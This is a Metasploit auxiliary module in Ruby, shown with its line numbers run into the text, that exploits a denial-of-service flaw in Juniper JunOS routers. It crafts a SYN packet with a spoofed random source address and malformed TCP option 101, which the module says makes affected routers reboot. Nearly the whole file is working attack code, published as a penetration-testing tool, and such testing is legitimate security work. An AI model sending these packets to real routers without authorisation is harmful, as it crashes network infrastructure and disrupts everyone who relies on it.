Path: blob/master/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Capture7include Msf::Auxiliary::Dos89def initialize10super(11'Name' => 'Juniper JunOS Malformed TCP Option',12'Description' => %q{13This module exploits a denial of service vulnerability14in Juniper Network's JunOS router operating system. By sending a TCP15packet with TCP option 101 set, an attacker can cause an affected16router to reboot.17},18'Author' => 'todb',19'License' => MSF_LICENSE,20'References' => [21['BID', '37670'],22['OSVDB', '61538'],23['URL', 'http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']24],25'Notes' => {26'Stability' => [CRASH_OS_RESTARTS],27'SideEffects' => [],28'Reliability' => []29}30)3132register_options([33OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),34OptInt.new('SPORT', [false, 'Source port (defaults to random)']),35OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])36])3738deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')39end4041def rport42datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i43end4445def sport46datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i47end4849def shost50datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s51end5253def run54open_pcap5556p = PacketFu::TCPPacket.new57p.ip_daddr = rhost58p.ip_saddr = shost59p.ip_ttl = rand(128..255)60p.tcp_sport = sport61p.tcp_dport = rport62p.tcp_flags.syn = 163p.tcp_win = rand(1..4096)64p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol65p.recalc66print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")67capture_sendto(p, rhost)68close_pcap69end70end717273